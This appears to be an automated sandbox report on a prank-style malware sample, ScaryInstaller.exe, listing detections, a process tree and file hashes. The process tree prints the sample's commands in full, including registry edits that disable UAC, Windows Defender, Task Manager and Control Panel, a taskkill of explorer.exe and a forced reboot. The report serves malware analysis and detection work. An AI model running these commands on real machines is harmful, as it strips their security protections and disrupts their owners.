Analysis

  • max time kernel
    151s
  • max time network
    161s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-08-2024 22:32

Errors

Reason
Machine shutdown

General

  • Target

    https://github.com/pankoza2-pl/malwaredatabase-old

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • NTFS ADS 2 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3192
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb03e23cb8,0x7ffb03e23cc8,0x7ffb03e23cd8
      2⤵
        PID:340
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
        2⤵
          PID:464
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3188
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
          2⤵
            PID:2144
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
            2⤵
              PID:1488
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
              2⤵
                PID:2380
              • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1448
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
                2⤵
                  PID:3400
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
                  2⤵
                    PID:3424
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                    2⤵
                      PID:2968
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
                      2⤵
                        PID:5044
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1892
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
                        2⤵
                          PID:1956
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6128 /prefetch:8
                          2⤵
                            PID:3432
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
                            2⤵
                            • Subvert Trust Controls: Mark-of-the-Web Bypass
                            • NTFS ADS
                            • Suspicious behavior: EnumeratesProcesses
                            PID:620
                          • C:\Users\Admin\Downloads\ScaryInstaller.exe
                            "C:\Users\Admin\Downloads\ScaryInstaller.exe"
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:352
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\61EC.tmp\creep.cmd" "
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              PID:4004
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im explorer.exe
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4640
                              • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\CreepScreen.exe
                                CreepScreen.exe
                                4⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:1636
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout 5 /nobreak
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Delays execution with timeout.exe
                                PID:708
                              • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\melter.exe
                                melter.exe
                                4⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:252
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout 10 /nobreak
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Delays execution with timeout.exe
                                PID:2528
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im CreepScreen.exe
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3432
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im melter.exe
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1268
                              • C:\Program Files\VideoLAN\VLC\vlc.exe
                                "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\61EC.tmp\scarr.mp4"
                                4⤵
                                • Suspicious behavior: AddClipboardFormatListener
                                • Suspicious behavior: GetForegroundWindowSpam
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SetWindowsHookEx
                                PID:832
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
                                4⤵
                                • Sets desktop wallpaper using registry
                                • System Location Discovery: System Language Discovery
                                PID:2456
                              • C:\Windows\SysWOW64\rundll32.exe
                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4560
                              • C:\Windows\SysWOW64\reg.exe
                                reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Modifies registry key
                                PID:4600
                              • C:\Windows\SysWOW64\reg.exe
                                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                4⤵
                                • UAC bypass
                                • System Location Discovery: System Language Discovery
                                • Modifies registry key
                                PID:656
                              • C:\Windows\SysWOW64\reg.exe
                                Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3080
                              • C:\Windows\SysWOW64\reg.exe
                                REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Modifies registry key
                                PID:2372
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3252
                              • C:\Windows\SysWOW64\net.exe
                                net user Admin /fullname:"IT'S TOO LATE!!!"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4412
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4516
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout 8 /nobreak
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Delays execution with timeout.exe
                                PID:3320
                              • C:\Windows\SysWOW64\shutdown.exe
                                shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3712
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5960 /prefetch:2
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3688
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:2932
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:1872
                            • C:\Windows\system32\AUDIODG.EXE
                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004D0
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3784
                            • C:\Windows\System32\PickerHost.exe
                              C:\Windows\System32\PickerHost.exe -Embedding
                              1⤵
                              • Suspicious use of SetWindowsHookEx
                              PID:896
                            • C:\Windows\system32\LogonUI.exe
                              "LogonUI.exe" /flags:0x4 /state0:0xa39cc855 /state1:0x41c64e6d
                              1⤵
                              • Modifies data under HKEY_USERS
                              • Suspicious use of SetWindowsHookEx
                              PID:1940

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              70e969d4a2b40aef8eb0736379c0bcfb

                              SHA1

                              608c4fdf0e6b820eed23b793884e11210b32be58

                              SHA256

                              82e6cd647225c2781d32207ca56e1bf5e85dddabdfdf67a469c6e8910062975c

                              SHA512

                              e38f13e75d7a74400b1c21be8c5d8045c366078c4bfd7a25de86a872a22db8b383484c4f044d433f557ba3f181670398eeb7322fb6946a3bfff03875576b596d

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              fc36221d3cc9a4657faeb51e3ea7023a

                              SHA1

                              22e3f8e68b2dd3992d544f8ca57c48c6878f77f9

                              SHA256

                              f393d5cc1a1b59d1bf0f19ade21515652b60bdea4b2d11780b904eb90fdd7b4b

                              SHA512

                              1d831b911b8e6970f3c829d7aed3c7d0faeb3f986fa029c8db8e2b2ced40898ad96b26311e620300ecd6d5a71f444582052b9ae11c4231224010096105bdb117

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                              Filesize

                              2KB

                              MD5

                              0189b12160bfb5d4cf817a3bb0a415d7

                              SHA1

                              03ac35ea0bc9089d320e972eb148c2fa80da811a

                              SHA256

                              fdcecd4977cc68071404063bb31000c770337b2896d50625dddc81f3f727a580

                              SHA512

                              c52e6fc8ca012fb2c14d02a0cdbec271ef3910583ff63311cbf89bd19c8c6faacb08926cd2f25f3f00b4d1d47a204d5d26539fe0896326ee1ec1d3a449a2d2a0

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                              Filesize

                              496B

                              MD5

                              30322550d9f9c54f345ea1c71f3b2e8f

                              SHA1

                              b5a3cff2995147279c2bbed7c03b2280ecb286e5

                              SHA256

                              4e7798d8476361378f8fbfb0442db63c7f6bf7e1830d50808bfdb8a58700d8f9

                              SHA512

                              261d1f5bc9c8a369f815eb846c252f54681f70862153bd49959411450870207b3ee240cc9016533c27401922527d561cc1ea7bb23708e4a257f071d010cf55ef

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              7be4d708c39f64a4064702faece3b745

                              SHA1

                              7c56df7a8130161bab9797fc66343f2bb7070cb4

                              SHA256

                              1702bef59efad48b34c3dd3726d926eebac4e60d8c4bff9da68da8d12c8a4175

                              SHA512

                              7b7f511cce53b6a6dedfa5136a48aca321fcb88cfee73e079bea85b94d8a06587af8f823729f10071145a61d57dddc1dd7459071668b39528323de1850548629

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              929adeefd6d0beba762f57e5e2f14ebf

                              SHA1

                              0f6fa337be0c53bf19a116264c6813a2b9f4b469

                              SHA256

                              fbc70bd4bda225f89f56a1208b51300c3ed9ef63c0eb05f2d250cf12fa117e91

                              SHA512

                              c516e333b1083bf36aeda8fddb3ce9d292c9b3f8667b219bb2eb2613b35722140e0dca71d0c116e1490235696a21a4e735e19ff590cfd5ce4fb742fcec11768a

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              dff6af21563d5ad2709aea894622efb0

                              SHA1

                              6b3fadd073217ec7986f622e38c872733cbcf415

                              SHA256

                              b13941caa3dae98c9988af179ee0067efa9b3406b709abd07194ed498b2ea76d

                              SHA512

                              32c57f7b8de9d03065d99c53952085d324f63955b0fb2b6c494394e6b619002c8f419511e616c8ceeae601c5aa7dc935d0a12ee89e88fd095b576ad380d93cca

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              86597e1962b9ea3980eb0747b04e5664

                              SHA1

                              4b8a9092bb93d441044cf0a4fd48b71ddde3ebe4

                              SHA256

                              84c7d8025b256358ce13d60c5446c773a605211a50e7c04a6d2387eaf64a582a

                              SHA512

                              c025a694b455cf7cca46269a4282188bd695679abb48573beb5002da116528f207065eb558d962b4414650f76edcfc8cdd5bca6deec2ae83128e4fc00e61a4b9

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                              Filesize

                              25KB

                              MD5

                              8c0d6616af07f61a695d23555f03afb5

                              SHA1

                              4d920d7f35be99217c86ea4dc2396a55e960a537

                              SHA256

                              ecc17c289b6a0f4fe10cae7e9eed2413279d3d4354d82fcc9bc672b7bd7493aa

                              SHA512

                              f903fe7977d14cc2d021bbf54f103421d0500cbf7b7f3cfd4ba93ae56af294307ec1b7d82c93d1fb530bb132ef4d009aa244ce2a60c23d7748b5ca08e4c7a2d0

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              874B

                              MD5

                              f336f8a39568d18123d2994d96a2eb41

                              SHA1

                              5846457d93d19d837e0b35a61e9f917215a366d9

                              SHA256

                              ddc41edb1416d0f7773cfc998a34042c5ca7117e9e4eea0ef98442e27f46f1f0

                              SHA512

                              4743163ffc5acc771d683f08f4476876853ddc46f47402d7c7c543ebd9d0a315e23a60a4777157d7daa3dc0376b5e12ff127755d66f884b1d466958b60bf2873

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              1KB

                              MD5

                              248203ea708a830701c19b699e83d654

                              SHA1

                              9bb1c10a8c43b17cc0eb59625dfa90cc3f8eb915

                              SHA256

                              886eeb486b61e33ba9b6bb1a34712efb27f118f7539c46b7510a4d62e35e6587

                              SHA512

                              9cac1c21da512bfbb191ad87d689c620e007f1b35927b89ec93026a3a17de2cd81b7f67a8112d98f26ebaa7046500d41110d8eb4ef519950a5feb70defebb42d

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              874B

                              MD5

                              cdbc52dc723f5fcb79a910cbf628df0b

                              SHA1

                              1b8e283ffea377b4e32c087d50ab220e934ffefe

                              SHA256

                              ea6ea0d904cfd880ee4d66a872cd4662e8e487dcd9f1cbf0a6a4d9185eb921f9

                              SHA512

                              a110be4133ab57cf5a801d168636fc2a746c1d46cb01c2e384eab37cd9bb45c0d5cc9e5044a5f3af04f7fdf6c21c8c69b4c0eb2226c7a774db23fdefbdda3a97

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              874B

                              MD5

                              53e5499039f5b3d0033cab8015e1e2ef

                              SHA1

                              965feb501b36a4a199eca0cb6ee8c4096f678cd8

                              SHA256

                              ec5cbe6d2cb1c419d39dd85bcfd021fed5d875f2cfe641c36b0557d874ab5e56

                              SHA512

                              2c9a03c3921781e551ef8cfc7aa99fe34a96442284ba4fc04cf0a7d4ffa40114c37063e19d8680fd5ab01836c8b5752fc8ba8c1b75a1f4ad3f677f2128968f53

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57eabe.TMP

                              Filesize

                              874B

                              MD5

                              da78117e90d34c970dccd54e8df9bb1d

                              SHA1

                              6b2ffaa996ffc41fd06f8c992c1f98a2d036559f

                              SHA256

                              e1d81d10065dd45f3ec87a9743a1d829d506535411d9fa3f9deea0bd0a36c912

                              SHA512

                              8462edb7e7fac50afbcd08323fef7b10096843e03c2052c8c2f9e4abd498e2851fac1e51516d2071b90a771114f20cc064efb947ed92890830015840ca73e830

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                              Filesize

                              16B

                              MD5

                              6752a1d65b201c13b62ea44016eb221f

                              SHA1

                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                              SHA256

                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                              SHA512

                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                              Filesize

                              11KB

                              MD5

                              bc1d8f47003fa00bbfc4c691bf624ceb

                              SHA1

                              7991365fd011797a6812ddb60e95ca160aae6093

                              SHA256

                              f015e6ed70ad6f65fe3cba5620be34aef8f8264afaaf130e1685f52566c0fb88

                              SHA512

                              370b8accb4ae8b6d4282b0dd4179f52d3769221a08728b7da4aaaf11293e89b651986315cbd315f81d847ea16bd4824fa5549c9a0d76c33e2d58e83802a4ee43

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                              Filesize

                              10KB

                              MD5

                              d15b341cda8598675a5da8b9cc64009a

                              SHA1

                              4093e88736242f084f1b9db018de7fa5ec4ea1bb

                              SHA256

                              7d986eb2e272257e4a605b956b2860f46353b9e8d5588c9f97400e76ac4b4384

                              SHA512

                              23c49d7f4c024a8d8417c65e3f1135043bc054275dd879936572af5767fb4c08f1f42be00f3d87a19cbdef19425bd2986f59b71c0adfd136a0ec9c40888a3e3c

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\CreepScreen.exe

                              Filesize

                              128KB

                              MD5

                              4ab112b494b6c6762afb1be97cdc19f5

                              SHA1

                              eed9d960f86fb10da90d0bbca801aea021658f02

                              SHA256

                              ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e

                              SHA512

                              4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\bg.bmp

                              Filesize

                              5.9MB

                              MD5

                              463e7914d89b7dd1bfbba5b89c57eace

                              SHA1

                              7f697f8880bcf0beed430d80487dd58b975073fa

                              SHA256

                              fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d

                              SHA512

                              a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\creep.cmd

                              Filesize

                              1KB

                              MD5

                              e77d2ff29ca99c3902d43b447c4039e2

                              SHA1

                              2805268a8db128a7278239d82402c9db0a06e481

                              SHA256

                              1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c

                              SHA512

                              580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\melter.exe

                              Filesize

                              2KB

                              MD5

                              33b75bd8dbb430e95c70d0265eeb911f

                              SHA1

                              5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83

                              SHA256

                              2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12

                              SHA512

                              943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\mover.exe

                              Filesize

                              548KB

                              MD5

                              c1978e4080d1ec7e2edf49d6c9710045

                              SHA1

                              b6a87a32d80f6edf889e99fb47518e69435321ed

                              SHA256

                              c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8

                              SHA512

                              2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\scarr.mp4

                              Filesize

                              19.0MB

                              MD5

                              a504846de42aa7e7b75541fa38987229

                              SHA1

                              4c8ba5768db2412d57071071f8573b83ecab0e2d

                              SHA256

                              a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89

                              SHA512

                              28b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea

                            • C:\Users\Admin\Downloads\ScaryInstaller.exe:Zone.Identifier

                              Filesize

                              26B

                              MD5

                              fbccf14d504b7b2dbcb5a5bda75bd93b

                              SHA1

                              d59fc84cdd5217c6cf74785703655f78da6b582b

                              SHA256

                              eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                              SHA512

